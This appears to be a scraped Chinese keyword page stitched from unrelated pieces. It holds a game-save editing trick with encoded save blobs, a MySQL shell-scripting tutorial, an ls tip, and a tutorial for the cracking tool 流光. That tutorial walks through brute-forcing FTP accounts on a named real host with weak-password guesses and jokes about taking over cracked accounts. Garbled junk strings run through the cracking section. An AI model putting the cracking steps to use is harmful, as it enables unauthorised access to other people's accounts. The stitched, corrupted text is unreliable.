包含4dirnuxdb的詞條

本文目錄一覽:

國王的勇士3極品號源

先去下載一個SOL修改器

1、打開遊戲,新建一個號(注意號里最好不要有其他號)。

2、創建好號以後,開始脫機工作(如果你找不到脫機工作就拔網線)。

3、在游戲裏保存一下(記得此時是脫機工作的)。

4、去C盤搜索你4399賬號(比如賬號就123456789,就搜索123456789)。

5、你會搜索到一個文件夾,打開文件夾,有一個SOL文件。

6、此時打開你下載好的SOL修改器,把搜索的SOL文件拖到SOL修改器里。

7、然後是一個表格的形式,找到date這一欄,雙擊這一欄最後一格,把裏面的東西都清光,把號源黏貼進去。

8、點SOL修改器左上角的保存。

9、取消脫機工作或鏈接網線。

10、大功告成,重新登陸你的賬號。

遊戲介紹

傳說每隔100年噠噠大陸將出現一位國王的勇士,現在正是下一任國王的勇士誕生的時刻了。噠噠大陸的伊娃女神派祭祀娜娜去尋找命運之子,她們尋找了很久,終於在地球找到了勇士的化身,你!在一次偶然的機會裡把你從地球傳送到噠噠大陸。

你作為噠噠大陸的勇士化身,你必須要肩任幫助噠噠大陸國民安居樂業降妖除魔的使命,歷經磨難,最終也將成為這裡的國王統治你的子民!如今,勇士誕生了!

國王的勇士3有極品號源嗎?最好帶圖!

戰士

eNrtGmtvG8fxW3/IfVaJ29c91E+WE/kROZBsITZgGMJRWoonkTyKdyItCQIatGka9I0WaIEUcIAUKIogRQsUqOMm/TWW1X7KX+jOzN6LIinSkZu6sCDsa3bntbMzs8v7zvtffe/EaetB4iyfOPpx31kOPNf8LTnt5DDVKQy7UPQH8baGRjfp6SNnmbk0bTtK286ye7rk7ERHd/UoGuzArAc3OcxZMg0FDQPvRGl2Q2f5HCak73LBlFJ+uOTEZshM7+ih7hjgktNMDnfbmbOcDQ61Wc2nM3EJFzzngk/hghkepMdDn7jgU7kwy/s6Mzp5eOI0D1staD2COWm6H3c6emcr7aMUXaqyo77h1jn//RPz7xRoQ2/J6UXdGkgfHMZ91DaDYjvp7cRZnPSc5d5hp2MY24Y2aCDJEsJ7YtjJBlEv7UcD3cvymQO9XbRH8U7WzjttHaMo0ANJuklzD1F2DtOtdv/OtQeG6QYzoG70+Fo3OQScRgWGZF8PsqM7RnN6ACvSvta0Xfkyo/c4Slai5Ha8NrQquKvTLBlogiY7u9quqI4bi9sC+nZJjszQS1EkaCN4EtEGe+VkSXOtgdbHeqsP0hvQvj6Cnbd8VHHnyKp8LDlRlkXb+6axo1u6tw1DxFhJccmKVxeowmiNiUclKuDH4kfzf41YtUfg+dPPz5/98ezPn5x/9KezX311/uyL888+MUh6hsiaPTBm5XGbMMTpzcTsUCvqpLq0zf8hq3xjk7WNbvDXyyonhphqgIl7LRMsHTLYf336wdkfPjz75c/PfvLh2T+/f/7×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 第二部分:eNpNjbsOwjAMRTc+xHOGgsTSjR1R9orBBDex1NiiSQtV1YUvxzAgtqv7OptXuwDLRFJ0mKFeIKmQicoBF0oZ6vbiIOHzSBJKhHpvicdsqlodXFG+Xa/Scfjss45ya8ztsM/kIEd9NCXScO5xpuHnpzGz/+vdR+y5GBkihwj23RnxxKiHZJfFyLvt+gZMcDtI

遊俠第一部分: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 

第二部分:

eNo1jLEOwjAMRDc+xHOGIgRDNnZEWZgqhlDcxlLjiMQBqqoLX46p1O3u6d1tvtcJiF/IEtMIdoIQGTVUBkgwZLDNzUDrsl9YcJ8Tci/a9tVs4O544Z3CM7l4DLGwgN1tD7qK3FH/P30WN5DoLXjqPRjIqj1q3UoqqNXHdy0e02VwI6YVh5KpXa15/gFPyDpj

lilnux的mysql初次的密碼哪個文件

中連接mysql數據庫,如何在shell中創建數據庫,創建表,插入csv文件,讀取mysql數據庫,導出mysql數據庫為xml或html文件,

並分析了核心語句。本文介紹的方法適用於PostgreSQL ,相對mysql而言,shell 中讀寫PostgreSQL會更簡單些。

1. 連接mysql 數據庫

shell中連接數據庫的方法很簡單,只需要指定用戶名,密碼,連接的數據庫名稱,然後通過重定向,輸入mysql的語句,如下所示:

mysql -u USERNAME -p PASSWORD DATABASENAME EOF 2/dev/null

show databases;

EOF

但這並不是一個好辦法,任何使用該腳本的用戶都能看到該數據庫用戶的賬號和密碼,要解決這個問題,可以用mysql

數據庫的一個特殊配置文件。mysql 數據庫使用$HOME/.my.cnf

文件來讀取特殊的啟動命令和設置。其中一項設置是由該用戶賬戶發起的mysql 會話的默認密碼。要在這個文件中設置默認密碼,可以加入下面的內容:

[client]

password = 123456

然後,別忘了修改權限:

chmod 400 .my.cnf

這樣就可以通過腳本訪問mysql數據庫了,如下所示:

#!/bin/bash

MYSQL=`which mysql`

$MYSQL test -u root EOF

show databases;

show tables;

select * from employees where salary 4000;

EOF

2. 創建數據庫

通過上面的方法連接數據庫,再通過重定向輸入mysql語句,shell中讀寫mysql基本就介紹完了。只要把sql語句寫對了,通過重定向執行即可,下面來看一個實例:

#!/bin/bash

##############################

# @file create_db_mysql.sh

# @brief create database and tables in mysql

# @author Mingxing LAI

# @version 0.1

# @date 2013-01-20

##############################

USER=”root”

DATABASE=”students”

TABLE=”students”

######################

#crate database

mysql -u $USER EOF 2/dev/null

CREATE DATABASE $DATABASE

EOF

[ $? -eq 0 ] echo “created DB” || echo DB already exists

######################

#create table

mysql -u $USER $DATABASE EOF 2/dev/null

CREATE TABLE $TABLE(

id int,

name varchar(100),

mark int,

dept varchar(4)

);

EOF

[ $? -eq 0 ] echo “Created table students” || echo “Table students already exist”

######################

#delete data

mysql -u $USER $DATABASE EOF 2/dev/null

DELETE FROM $TABLE;

EOF

這個腳本比較簡單,就是幾條SQL語句,沒什麼好解釋的,下面來看一下,如何讀入csv 文件,然後插入到mysql數據庫中。

3. 插入csv 文件

上面創建了一個學生表,表中有學生的學號,姓名,成績,系別,假設有一個csv文件,內容如下:

$cat data

1,Navin M,98,CS

2,Kavya N,70,CS

3,Nawaz O,80,CS

4,Hari S,80,EC

5,Alex M,50,EC

6,Neenu J,70,EC

7,Bob A,30,EC

8,Anu M,90,AE

9,Sruthi,89,AE

10,Andrew,89,AE

為了將csv 文件插入到數據庫,我們需要逐行讀入,然後給字符串加上雙引號,最後生成語句如下:

insert into students VALUES(1, “Navin M”, 98, “CS”);

要解析csv 文件,最好的工具莫過於awk了,將域的分隔符指定為逗號-F,,awk就自動將各個域拆分出來了,然後在需要雙引號的地方打印輸出一個雙引號,就能夠輕鬆得到下面這樣的數據:

1, “Navin M”, 98, “CS”

awk 代碼如下:

query=`echo $line | awk -F, ‘{ printf(“%s,\”%s\”,%s,\”%s\””, $1, $2, $3, $4)}’`

statement=`echo “INSERT INTO $TABLE VALUES($query);”`

echo $statement

當然了,你也可以用其他辦法,不過,幾乎沒有比awk更簡單的了,第2種方法如下:

oldIFS=$IFS

IFS=,

values=($line)

values[1]=”\”`echo ${values[1]} | tr ‘ ‘ ‘#’ `\””

values[3]=”\”`echo ${values[3]}`\””

query=`echo ${values[@]} | tr ‘ #’ ‘, ‘`

IFS=$oldIFS

statement=`echo “INSERT INTO $TABLE VALUES($query);”`

echo “$statement”

首先通過指定域分隔符,將csv文件解析成一個數組,然後將空格替換成一個特殊的符號”#”(因為後面的替換中,會一次性輸出數組,而數組是用空格分隔各字段,我們要將分隔數組的空格替換成逗號,所以這裡將數據中的空格替換成”#”)

,給字符串加上雙引號,最後再把空格替換成逗號,把”#”替換為空格。這種方法真是讓人抓狂,我第一次就沒有看明白,尤其是為什麼要將空格替換成”#”。

完整的插入數據的程序如下:

#!/bin/bash

#

# @file write_to_db_mysql.sh

# @brief wirte data to database in mysql

# @author Mingxing LAI

# @version 0.1

# @date 2013-01-20

#

USER=”root”

DATABASE=”students”

TABLE=”students”

if [ $# -ne 1 ]; then

echo $0 DATAFILE

echo

exit 2

fi

data=$1

while read line;

do

# query=`echo $line | awk -F, ‘{ printf(“%s,\”%s\”,%s,\”%s\””, $1, $2, $3, $4)}’`

oldIFS=$IFS

IFS=,

values=($line)

values[1]=”\”`echo ${values[1]} | tr ‘ ‘ ‘#’ `\””

values[3]=”\”`echo ${values[3]}`\””

query=`echo ${values[@]} | tr ‘ #’ ‘, ‘`

IFS=$oldIFS

statement=`echo “INSERT INTO $TABLE VALUES($query);”`

# echo $statement

mysql -u $USER $DATABASE EOF

INSERT INTO $TABLE VALUES($query);

EOF

done $data

if [[ $? -eq 0 ]]; then

echo “Wrote data into DB”

fi

4. 讀取數據

知道怎麼在shell 中連接mysql ,也知道了怎麼在shell中批量執行sql 語句,讀取數據,就沒有任何難度了。

#!/bin/bash

#

# @file read_db_mysql.sh

# @brief read data from mysql

# @author Mingxing LAI

# @version 0.1

# @date 2013-01-20

#

USER=”root”

DATABASE=”students”

TABLE=”students”

#用tail 去掉表頭

depts=`mysql -u $USER $DATABASE EOF | tail -n +2

SELECT DISTINCT dept FROM $TABLE;

EOF`

for d in $depts; do

echo Department: $d

result=”`mysql -u $USER $DATABASE EOF

set @i:=0;

SELECT @i:=@i+1 as rank, name, mark FROM students WHERE dept=”$d” ORDER BY mark DESC;

EOF`”

echo “$result”

echo

done

我們還可以在mysql語句中,使用選項來控制數據的輸出格式

-H 輸出為html

-X 輸出為xml

如下所示:

#!/bin/bash

USER=”root”

DATABASE=”students”

TABLE=”students”

mysql -u $USER $DATABASE -H EOF

select * from $TABLE

EOF

html 格式的可讀性比較差,輸出效果如下:

TABLE BORDER=1TRTHid/THTHname/THTHmark/THTHdept/TH/TRTRTD1/TDTDNavin M/TDTD98/TDTDCS/TD/TRTRTD2/TDTD Kavya N/TDTD70/TDTDCS/TD/TRTRTD3/TDTD Nawaz O/TDTD80/TDTDCS/TD/TRTRTD4/TDTDHari S/TDTD80/TDTDEC/TD/TRTRTD5/TDTDAlex M/TDTD50/TDTDEC/TD/TRTRTD6/TDTDNeenu J/TDTD70/TDTDEC/TD/TRTRTD7/TDTDBob A/TDTD30/TDTDEC/TD/TRTRTD8/TDTDAnu M/TDTD90/TDTDAE/TD/TRTRTD9/TDTDSruthi/TDTD89/TDTDAE/TD/TRTRTD10/TDTDAndrew/TDTD89/TDTDAE/TD/TR/TABLE

可讀性差也可以理解,因為人家覺得,你沒必要修改么,直接以html形式展示數據就可以了。

id name mark dept

1 Navin M 98 CS

2 Kavya N 70 CS

3 Nawaz O 80 CS

4 Hari S 80 EC

5 Alex M 50 EC

6 Neenu J 70 EC

7 Bob A 30 EC

8 Anu M 90 AE

9 Sruthi 89 AE

10 Andrew 89 AE

xml形式的數據顯示就比較正常了,直接將上面的-H 換成-X,輸出如下:

?xml version=”1.0″?

resultset statement=”select * from students” xmlns:xsi=””

row

field name=”id”1/field

field name=”name”Navin M/field

field name=”mark”98/field

field name=”dept”CS/field

/row

row

field name=”id”2/field

field name=”name” Kavya N/field

field name=”mark”70/field

field name=”dept”CS/field

/row

/resultset

leinux中如何使用Is查看隱藏文件信息?

ls命令為英文單詞 list 的縮寫,正如英文單詞 list 的意思,其功能是列出指定目錄下的內容及其相關屬性信息。

默認狀態下,ls命令會列出當前目錄的內容。而帶上參數後,我們可以用ls做更多的事情。

-a    顯示所有文件及目錄 (包括以「.」開頭的隱藏文件)  

-A    同 -a ,但不列出 「.」 (當前目錄) 及 「..」 (父目錄)  

語法格式: ls [選項] [文件] 學習Linux命令

# ls -a dir_name

# ls -A dir_name

請問流光怎麼用

流光教程

流光教程一 ON,Z$G*^ m*U

許多新人在用流光的時候不知道如何下手,小榕論壇來討論的也多是「如何添加用戶」這樣的初級問題 :),就抽了點時間寫這個簡單的教程,希望讓新手快速入門。 $Xn3l Ee M’fl7I

h4r3|)V”Sy

我個人認為流光的破解可分為5大部分: #?c”J4l’uL;Mum

nZX’vd;E3D4{+A6g 一、POP3/FTP/…探測

Y D Z”Aw9e

N z*l6A8nuxjAZ 二、IPC探測

+v8} ]2i X r3{V ~7cNNZi:W2u

三、SQL探測

0b*[1x8g’U #}??}8Hx8O

四、高級掃描 4v`I’\ D\Z

?\)r+x!e-q)j bf

五、其它 … 9FZ%J-tE6c(}+N8v

Q H^@4VX’p 因為開發時間的原因,上面的探測模式略有不同,所以分成了四個部分,本教程說的是第一個部分的探測。後面的探測模式應該屬於流光的高級應用了:) Z:X%?#a+y AV

6JO v+] f9jS,m x 下面我就簡單說一下基本的破解流程: $~S @O%r2D

z|+|)qsq BC 1、你得有流光,我這裡試驗用的是流光2001.FOR Win98 中文版.FOR Win2000的也可以。 nQ4]v-Az9NCD*_7G

Q a:x7c.Kf4u 首次啟動流光,看到如下圖的界面: :x2jWr0nJ+x

“d)zkP!\ h$a ]|Q0uro

X-U9[zO”k;M

首次使用是要註冊的,不過不要想到花錢:),小榕只是想看看有多少人用他的流光而已。你可以填好相應的選項,然後點發送即可,如果發送失敗,你把發送服務器換個就好了。

1Dy*^7CM4y4jj7BA )[sRpa7_/w

S;X j@_H

E+U4xtR:@5EYt/CJ)}

因為重裝系統,我也不知道我發了多少次了 :( 。如果不想註冊,就稍等下面的進度條走完,點稍後即可。如上圖:

y\Bs9Np9~9f%Ol`9F F5OGX-X?3c@U9L

tN;FQDgH-x -s(Z5w5FEr@p[

H9ed$^”N[*P”X .A$}Vtx6q2sJ

2、找個站點,我選的是中華網[url][/url]的主頁空間(home4u.china.com),探測方式:FTP。

N |B^Fk4Y +I V+X lf

有人常問掃描端口有什麼用,其實作用就是你知道他提供了什麼服務,然後可以採取相應的探測方式來獲得PASS了:)我們知道主頁幾乎都用的FTP上傳,我們這次就用來測試一堆用戶名,看看有沒有弱智的密碼,呵呵,如果有 hacker.at.china.com 這樣的,也不妨霸佔為己有:)

4n9N OnqZkd

7W NmEQ5ZHw 3、加入要破解的站點名稱:右鍵單擊FTP主機→編輯→添加→輸入 home4u.china.com →確定! \:] B E’MGw

mZy9yF:qpE8K eJ5L!I a#C4I1O*w

yUCX#X$x,r

CrN Ap

!zS,@}0m/P,V7} 4、加入用戶名:我們要破解的是一堆用戶名,所以要加入用戶名的列表文件!我們就加入流光目錄下的 Name.dic :)右鍵單擊剛才添加的主機:home4u.china.com → 編輯 → 從列表中添加 → Name.dic → 打開

;g$d.k H-W 5itXRHu%?8G

7_bvg’fU

C@2H W,]S NO%yOw-Y.\*E x hJkB6l

1l;v0{`!~d+e%hU u

然後會有「用戶已存在列表中」的提示,我們選中「不再提示」 → 確定 。如下圖: 6A ~:uu X3eh

$G7Z%~ nw

wVF5^tB#yT#k%Nf7c

CkjR-X[_@-b 用戶名太多,我們可以用點主機前面的「—」號把用戶列表縮起來,如下圖:

+l3^8TC0R3Ml

7Q,FP oe`”[mk Z-m1x^kB8j$Ej]

!V8WoCEr

大家注意名字前面的小框中必須有√要是沒有就無法探測了。 Xcj)[ PR

\JL,X5W Cv Lv o3G

5、有了用戶名,我們就可以進行探測了,大家會想到怎麼不用密碼?其實流光有個簡單模式的探測,也就是用內置的密碼」:「123456」和「用戶名」來進行探測,因為這樣的密碼是使用頻率最高的:) 9r)?e b;M4Y5y#pixy

{M JrO#j@Hmg_ 當然你可以修改這個簡單模式的文件,加入你認為弱智的密碼。方法是:單擊 工具菜單 → 模式文件設定 → 簡單模式探測設置文件 → 加入你要加入的密碼 → 把設置文件存盤! OQhI^,O

F Q_~.k ODI 下面我們就來看看這一堆名字裏面有多少是用「123456」和「自己名字」來作為密碼的。

}S~5M{)E

EbUz RqHZ 探測 → 簡單模式探測!

u$b’n(jR,Ik0h@

b(P*|@-s,U!P;uO.{ hm.T2l*t},|

T ]qI2q~

3F_(W(C j?\

M s+q O3L$s 探測中…

:fJ+A;T@S}u

y+g.Bl C-_6x”U@X+M1]B

$k.S*q!g.] X

K]e/y^Ii

